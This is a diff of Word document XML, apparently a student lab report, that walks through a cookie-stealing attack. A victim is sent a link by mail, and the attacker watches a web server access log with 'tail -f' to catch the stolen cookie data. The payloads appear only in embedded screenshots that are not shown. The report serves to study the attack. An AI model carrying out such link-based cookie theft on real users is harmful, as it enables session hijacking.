+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsiaTheme="minorEastAsia" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-Kore-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6E8AE0" wp14:editId="47D47915">
+            <wp:extent cx="3380323" cy="1846385"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="그림 2" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2" name="그림 2" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId17"/>
+                    <a:srcRect t="1955" r="1361"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3386780" cy="1849912"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241BD942" wp14:editId="4D012078">
+            <wp:extent cx="3547966" cy="3253154"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="그림 10" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="그림 10" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3550453" cy="3255434"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">his is just test. Thus, this mail should send to your email address. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>After this work is finished, attacker needs to open a web log window.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>o work, open the terminal.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38574AFE" wp14:editId="6BD9AFD9">
+            <wp:extent cx="2866292" cy="356115"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="그림 11" descr="병, 앉아있는, 표지판, 오렌지이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="그림 11" descr="병, 앉아있는, 표지판, 오렌지이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2882526" cy="358132"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="286E79DF" wp14:editId="12A3C610">
+            <wp:extent cx="4634584" cy="641838"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
+            <wp:docPr id="12" name="그림 12" descr="음식이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="12" name="그림 12" descr="음식이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4659363" cy="645270"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>This directory has a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>access_log</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If you move to this path, enter the command. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Command: tail – f </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>access_log</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A1C0FBE" wp14:editId="459F6820">
+            <wp:extent cx="3058734" cy="1112472"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
+            <wp:docPr id="13" name="그림 13" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="그림 13" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId21"/>
+                    <a:srcRect t="26235"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3068155" cy="1115898"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>If you finish all of work, you click the link.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E32F9E" wp14:editId="7AA761D9">
+            <wp:extent cx="5731510" cy="1543685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="14" name="그림 14" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="그림 14" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1543685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>The page will show like this to you.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>Then attacker can be received the cookie data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E48C46" wp14:editId="3E83D719">
+            <wp:extent cx="5731510" cy="293370"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="15" name="그림 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="293370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕" w:hint="eastAsia"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>we can confirm this attack method</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through this</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="바탕"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:sectPr>
